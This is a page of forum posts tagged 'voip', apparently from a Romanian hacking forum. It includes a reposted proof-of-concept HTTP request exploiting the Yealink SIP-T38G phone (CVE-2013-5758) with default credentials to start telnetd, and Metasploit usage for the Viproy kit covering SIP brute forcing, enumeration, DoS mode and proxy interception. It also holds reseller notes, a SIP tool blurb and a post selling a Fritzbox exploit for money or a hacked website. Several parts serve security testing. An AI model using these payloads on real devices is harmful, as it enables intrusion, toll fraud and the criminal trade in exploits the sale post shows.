Search the Community
Showing results for tags 'voip'.
files on
Yealink VoIP phone version SIP-T38G suffers from a remote command execution vulnerability. Title: Yealink VoIP Phone SIP-T38G Remote Command Execution Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team Vendor Homepage: Version: VoIP Phone SIP-T38G CVE: CVE-2013-5758 Description: Using cgiServer.exx we are able to send OS command using the system function. POC: POST /cgi-bin/cgiServer.exx HTTP/1.1 Host: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755) Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 0 system("/bin/busybox%20telnetd%20start") -- *Mr.Un1k0d3r** or 1 #* Yealink VoIP Phone SIP-T38G Remote Command Execution ? Packet Storm
- cve-2013-5758
- voip
(and 1 more)
Tagged with:
Am recomandat COSMOVOIP pentru ca are cele mai convenabile tarife din punctul meu de vedere (Romania, Germania). Sunt si alti reselleri oficiali BETAMAX. Betamax GmbH & CO kG si FINAREA SA este o firma germano-elvetiano-olandeza care activeaza pe domeniul telefoniei VOIP inca de prin 2005... Pentru ca sa devii reseller va trebui sa iti alegi un reseller deja existent si sa aplici la ei pe site in sectiunea Become a Reseller (nu toti resellerii ofera aceasta optiune) de ex. pentru CosmoVOIP intri aici CosmoVoip | Our rates are out of this world! si te inscri. Mai multe informatii gasesti aici CosmoVoip | Our rates are out of this world! si AICI Preturile difera de la reseller la reseller. E important sa'l alegi pe cel care iti ofera tarifele minime pentru zona care te intereseaza. Lista de reselleri oficiali pe care o am s'ar putea sa fie incompleta: 12VoIP Actionvoip BrowserCalls BudgetVoipCall Call2India CallEasy CallingCardBuster CallingCredit CallPirates CheapBuzzer CheapVoip CheapVoipCall CosmoVoip DialCheap DialNow DiscountCalling DiscountVoip EasyVoip FreeCall FreeVoipDeal Frynga GlobalFreecall HotVoip Internetcalls InterVoip Jumblo JustVoip Low-Rate Voip Lowratevoip MegaVoip MexicoBarato NairaCalls Netappel Netappel Nonoh Nonoh PanggilanMalaysia PennyConnect PinoyDialer PoivY PowerVoip RebVoice Rynga SIPDiscount SmartVoip Smsdiscount SMSLISTO Sparvoip StuntCalls Supervoip Telbo Voipblast VoipBlazer VoipBuster VoipbusterPro VoipCaptain VoIPCheap VoipChief VoipDiscount VoipGain VoipJumper VoipMove VoipRaider VoipSmash VoipStunt VoipWise VoipYo Voipzoom Webcalldirect Tarifele grupate comparativ pentru cativa dintre ei le gasesti AICI Platile se fac prin Paypal, cc, wt, etc Aplicatia se numeste MobileVOIP , functioneaza foarte bine, si are suport pentru Windows, Mac, Android, Symbian, Nokia Asha, BlackBerry, etc ..
Viproy - VoIP Penetration Testing Kit Project Page : Download : Viproy Voip Pen-Test Kit is developed to improve quality of SIP Penetration Tests. It provides authentication feature that helps to create simple tests. It includes 7 different modules with authentication support: options tester, brute forcer, enumerator, invite tester, trust analyzer, proxy and registration tester. All attacks could perform before and after authentication to fuzz SIP services and value added services. SIP Pen-test guide will be published soon. Basic Usage of Modules are presented below, it can be used before guide. All modules have DEBUG and VERBOSE supports Preparing Test Network VulnVOIP is vulnerable SIP server, you can use it for tests VulnVOIP : VulnVoIP Archives - Rebootuser Installation Copy "lib" and "modules" folders' content to Metasploit Root Directory. Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) Should Contain This Line require 'msf/core/auxiliary/sip' Videos & Papers Attacking SIP/VoIP Servers Using VIPROY VoIP Pen-Test Kit for Fun & Profit - Video (50 mins) This is a training video for penetration testing of SIP servers. Chapters of Training Video 1-Footprinting of SIP Services 2-Enumerating SIP Services 3-Registering SIP Service with/without Credentials 4-Brute Force Attack for SIP Service 5-Call Initiation with/without Spoof & Credentials 6-Hacking Trust Relationships 7-Intercepting SIP Client with SIP Proxy Viproy - VoIP Penetration Testing Kit Project Page : Download : Viproy Voip Pen-Test Kit is developed to improve quality of SIP Penetration Tests. It provides authentication feature that helps to create simple tests. It includes 7 different modules with authentication support: options tester, brute forcer, enumerator, invite tester, trust analyzer, proxy and registration tester. All attacks could perform before and after authentication to fuzz SIP services and value added services. SIP Pen-test guide will be published soon. Basic Usage of Modules are presented below, it can be used before guide. All modules have DEBUG and VERBOSE supports Preparing Test Network VulnVOIP is vulnerable SIP server, you can use it for tests VulnVOIP : VulnVoIP Archives - Rebootuser Installation Copy "lib" and "modules" folders' content to Metasploit Root Directory. Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) Should Contain This Line require 'msf/core/auxiliary/sip' Videos & Papers Attacking SIP/VoIP Servers Using VIPROY VoIP Pen-Test Kit for Fun & Profit - Video (50 mins) This is a training video for penetration testing of SIP servers. Chapters of Training Video 1-Footprinting of SIP Services 2-Enumerating SIP Services 3-Registering SIP Service with/without Credentials 4-Brute Force Attack for SIP Service 5-Call Initiation with/without Spoof & Credentials 6-Hacking Trust Relationships 7-Intercepting SIP Client with SIP Proxy Sample Usage Video Hacking Trust Relationships of SIP/NGN Gateways - Video Hacking Trust Relationships Between SIP Gateways (PDF) Usage Global Settings setg CHOST #Local Host setg CPORT 5099 #Local Port setg RHOSTS #Target Network setg RHOST #Target Host Basic Usage of OPTIONS Module use auxiliary/scanner/sip/vsipoptions show options set THREADS 255 run Basic Usage of REGISTER Module use auxiliary/scanner/sip/vsipregister show options run set LOGIN true set USERNAME 101 set PASSWORD s3cur3 run Basic Usage of INVITE Module use auxiliary/scanner/sip/vsipinvite set FROM 2000 set TO 1000 run set LOGIN true set FROM 102 set USERNAME 102 set PASSWORD letmein123 run set DOS_MODE true set NUMERIC_USERS true set NUMERIC_MIN 200 set NUMERIC_MAX 205 run Basic Usage of ENUMERATOR Module use auxiliary/scanner/sip/vsipenumerator show options unset USERNAME set USER_FILE /tmp/files/users2 set VERBOSE false set METHOD SUBSCRIBE run unset USER_FILE set METHOD SUBSCRIBE set NUMERIC_USERS true set NUMERIC_MAX 2300 run set METHOD REGISTER run Basic Usage of BRUTE FORCE Module use auxiliary/scanner/sip/vsipbruteforce show options set RHOST set USERNAME 2000 set PASS_FILE /tmp/files/passwords set VERBOSE false run unset USERNAME set USER_FILE /tmp/files/users2 run unset USER_FILE set NUMERIC_USERS true set NUMERIC_MAX 500 run Basic Usage of Trust Analyzer Module use auxiliary/scanner/sip/vsiptrust show options set SRC_RHOSTS set SRC_RPORTS 5060 set SIP_SERVER set INTERFACE eth0 set TO 101 run show options set ACTION CALL set SRC_RHOSTS set FROM James Bond run Basic Usage of SIP Proxy Module use auxiliary/scanner/sip/vsipproxy show options set PRXCLT_PORT 5060 set PRXCLT_IP set PRXSRV_PORT 5089 set PRXSRV_IP set CLIENT_IP set CLIENT_PORT 5060 set SERVER_IP set SERVER_PORT 5060 set CONF_FILE /tmp/sipproxy_replace.txt set LOG true set VERBOSE false run Source Viproy - Tools
- 1 reply
- penetration testing kit
- viproy
(and 1 more)
Tagged with:
SIP Inspector is a tool written in JAVA to simulate different SIP messages and scenarios. You can create your own SIP signaling scenarios, customize SIP messages and monitor incoming and outgoing messages. The tool can play RTP streams from a pcap. SIP Inspector Tutorial - SIP Inspector Download SIP Inspector from
Vand "smecherie" pentru getaway fritzbox WLAN (UI), directory transversal, admin data ..etc. Pret 3000 euro sau un website p0Wned, total 2 variante. Nu ofer nici o informatie inainte sa vad banii sau structura website. Nu cereti detali ca nu va dau decat dupa ce aratati marfa de schimb. Fara mail sau ym , skype, tw, numai PM.